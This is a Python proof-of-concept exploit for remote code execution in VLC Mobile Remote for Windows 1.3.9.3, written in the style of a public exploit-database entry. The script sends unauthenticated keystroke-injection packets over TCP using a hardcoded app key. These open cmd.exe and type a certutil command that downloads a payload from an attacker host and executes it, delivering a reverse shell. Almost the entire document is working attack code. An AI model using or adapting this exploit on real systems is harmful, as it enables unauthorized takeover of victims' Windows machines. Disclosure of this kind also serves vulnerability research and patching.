# Exploit Title: VLC Mobile Remote (VMR) for Windows v1.3.9.3 RCE V2
# Date: 06/24/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://vlcmobileremote.com
# Software Link: https://vlcmobileremote.com/Releases/Setup.exe
# Version: 1.3.9.3
# Tested on: Windows 10 (Build 19044)

'''
Description:

VLC Mobile Remote for Windows 1.3.9.3 allows remote code execution via
unauthenticated keystroke injection over TCP, enabling command execution
and reverse shell delivery.

'''

import socket, time, json, urllib.parse

host, port = "192.168.8.105", 5916
auth = "I2t3H*9s65J7F!E03K9M"
lhost = "192.168.8.100"
payload = "shell.exe"
cmd = f"certutil -urlcache -split -f http://{lhost}/{payload}
C:\\Windows\\Temp\\payload.exe & C:\\Windows\\Temp\\payload.exe"
cmds = [
    ("launch_url", "file://C:/Windows/System32/cmd.exe", "Launch CMD"),
    ("textinput", urllib.parse.quote(cmd), "Send command"),
    ("enter", "", "Run command")
]

with socket.socket() as s:
    s.connect((host, port))
    for k, v, label in cmds:
        req = f"/requests/keyboard/command?key={k}&value={v}" if k !=
"launch_url" else f"/requests/system/command?key={k}&value={v}"
        pkt = {"appAuthenticationKey": auth, "password": "", "sentTime":
str(int(time.time() * 1000)), "request": req}
        s.sendall((json.dumps(pkt) + "\x0a").encode())
        print(f"[>] {label}")
        time.sleep(3 if k == "launch_url" else 1)

print("[✓] Done.")